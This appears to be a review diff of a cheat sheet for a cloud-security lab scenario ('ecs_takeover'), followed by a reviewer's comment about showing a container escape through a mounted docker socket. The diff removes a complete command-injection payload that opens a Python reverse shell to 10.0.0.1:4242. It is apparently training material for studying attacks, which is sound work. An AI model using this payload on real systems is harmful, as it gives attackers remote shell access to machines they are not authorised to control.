scenarios/ecs_takeover/cheat_sheet.md

```diff
@@ -1,43 +1,41 @@
-1. Exploit the website via command injection.
+1. Find the command injection vulnerability in the website.
 
     ```bash
-    ; export RHOST="10.0.0.1";export RPORT=4242;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
```

Comment:
This is a much more direct method of shelling the host instance. I think as long as it is documented how this command works IE running from the a container with the docker sock mounted it's okay to do it this way. I think there is still benefit of showcasing a container escape.